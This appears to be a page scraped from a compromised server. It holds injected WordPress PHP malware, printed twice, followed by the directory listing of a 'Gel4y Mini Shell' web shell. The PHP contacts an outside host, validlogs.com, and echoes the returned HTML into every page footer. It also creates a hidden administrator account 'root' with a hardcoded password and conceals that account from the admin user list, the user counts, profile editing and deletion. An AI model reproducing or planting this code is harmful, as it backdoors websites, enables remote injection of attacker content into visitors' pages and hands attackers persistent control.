function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.221)
  • Path: ~/usr/lib/python2.7/lib2to3/fixes/
    Name Size Permission Action
    __init__.py 0.046KB -rw-r--r--
    __init__.pyc 0.128KB -rw-r--r--
    fix_apply.py 2.376KB -rw-r--r--
    fix_apply.pyc 2.029KB -rw-r--r--
    fix_asserts.py 0.961KB -rw-r--r--
    fix_asserts.pyc 1.519KB -rw-r--r--
    fix_basestring.py 0.313KB -rw-r--r--
    fix_basestring.pyc 0.782KB -rw-r--r--
    fix_buffer.py 0.577KB -rw-r--r--
    fix_buffer.pyc 0.936KB -rw-r--r--
    fix_dict.py 3.734KB -rw-r--r--
    fix_dict.pyc 3.673KB -rw-r--r--
    fix_except.py 3.273KB -rw-r--r--
    fix_except.pyc 2.931KB -rw-r--r--
    fix_exec.py 0.979KB -rw-r--r--
    fix_exec.pyc 1.393KB -rw-r--r--
    fix_execfile.py 2.008KB -rw-r--r--
    fix_execfile.pyc 2.053KB -rw-r--r--
    fix_exitfunc.py 2.444KB -rw-r--r--
    fix_exitfunc.pyc 2.683KB -rw-r--r--
    fix_filter.py 2.058KB -rw-r--r--
    fix_filter.pyc 2.211KB -rw-r--r--
    fix_funcattrs.py 0.63KB -rw-r--r--
    fix_funcattrs.pyc 1.096KB -rw-r--r--
    fix_future.py 0.534KB -rw-r--r--
    fix_future.pyc 0.905KB -rw-r--r--
    fix_getcwdu.py 0.441KB -rw-r--r--
    fix_getcwdu.pyc 0.912KB -rw-r--r--
    fix_has_key.py 3.151KB -rw-r--r--
    fix_has_key.pyc 3.117KB -rw-r--r--
    fix_idioms.py 4.774KB -rw-r--r--
    fix_idioms.pyc 4.417KB -rw-r--r--
    fix_import.py 3.184KB -rw-r--r--
    fix_import.pyc 3.165KB -rw-r--r--
    fix_imports.py 5.56KB -rw-r--r--
    fix_imports.pyc 5.234KB -rw-r--r--
    fix_imports2.py 0.282KB -rw-r--r--
    fix_imports2.pyc 0.615KB -rw-r--r--
    fix_input.py 0.693KB -rw-r--r--
    fix_input.pyc 1.115KB -rw-r--r--
    fix_intern.py 1.822KB -rw-r--r--
    fix_intern.pyc 1.749KB -rw-r--r--
    fix_isinstance.py 1.571KB -rw-r--r--
    fix_isinstance.pyc 1.803KB -rw-r--r--
    fix_itertools.py 1.514KB -rw-r--r--
    fix_itertools.pyc 1.757KB -rw-r--r--
    fix_itertools_imports.py 2.045KB -rw-r--r--
    fix_itertools_imports.pyc 1.977KB -rw-r--r--
    fix_long.py 0.466KB -rw-r--r--
    fix_long.pyc 0.829KB -rw-r--r--
    fix_map.py 2.99KB -rw-r--r--
    fix_map.pyc 2.977KB -rw-r--r--
    fix_metaclass.py 8.023KB -rw-r--r--
    fix_metaclass.pyc 6.433KB -rw-r--r--
    fix_methodattrs.py 0.601KB -rw-r--r--
    fix_methodattrs.pyc 1.119KB -rw-r--r--
    fix_ne.py 0.56KB -rw-r--r--
    fix_ne.pyc 0.97KB -rw-r--r--
    fix_next.py 3.106KB -rw-r--r--
    fix_next.pyc 3.456KB -rw-r--r--
    fix_nonzero.py 0.584KB -rw-r--r--
    fix_nonzero.pyc 1.068KB -rw-r--r--
    fix_numliterals.py 0.755KB -rw-r--r--
    fix_numliterals.pyc 1.228KB -rw-r--r--
    fix_operator.py 3.391KB -rw-r--r--
    fix_operator.pyc 5KB -rw-r--r--
    fix_paren.py 1.199KB -rw-r--r--
    fix_paren.pyc 1.515KB -rw-r--r--
    fix_print.py 2.798KB -rw-r--r--
    fix_print.pyc 2.671KB -rw-r--r--
    fix_raise.py 2.865KB -rw-r--r--
    fix_raise.pyc 2.447KB -rw-r--r--
    fix_raw_input.py 0.444KB -rw-r--r--
    fix_raw_input.pyc 0.922KB -rw-r--r--
    fix_reduce.py 0.819KB -rw-r--r--
    fix_reduce.pyc 1.24KB -rw-r--r--
    fix_renames.py 2.166KB -rw-r--r--
    fix_renames.pyc 2.399KB -rw-r--r--
    fix_repr.py 0.6KB -rw-r--r--
    fix_repr.pyc 1KB -rw-r--r--
    fix_set_literal.py 1.659KB -rw-r--r--
    fix_set_literal.pyc 1.949KB -rw-r--r--
    fix_standarderror.py 0.439KB -rw-r--r--
    fix_standarderror.pyc 0.841KB -rw-r--r--
    fix_sys_exc.py 1.015KB -rw-r--r--
    fix_sys_exc.pyc 1.673KB -rw-r--r--
    fix_throw.py 1.549KB -rw-r--r--
    fix_throw.pyc 1.957KB -rw-r--r--
    fix_tuple_params.py 5.446KB -rw-r--r--
    fix_tuple_params.pyc 5.311KB -rw-r--r--
    fix_types.py 1.767KB -rw-r--r--
    fix_types.pyc 2.152KB -rw-r--r--
    fix_unicode.py 1.239KB -rw-r--r--
    fix_unicode.pyc 1.684KB -rw-r--r--
    fix_urllib.py 8.188KB -rw-r--r--
    fix_urllib.pyc 6.975KB -rw-r--r--
    fix_ws_comma.py 1.069KB -rw-r--r--
    fix_ws_comma.pyc 1.357KB -rw-r--r--
    fix_xrange.py 2.636KB -rw-r--r--
    fix_xrange.pyc 2.999KB -rw-r--r--
    fix_xreadlines.py 0.674KB -rw-r--r--
    fix_xreadlines.pyc 1.133KB -rw-r--r--
    fix_zip.py 0.883KB -rw-r--r--
    fix_zip.pyc 1.322KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet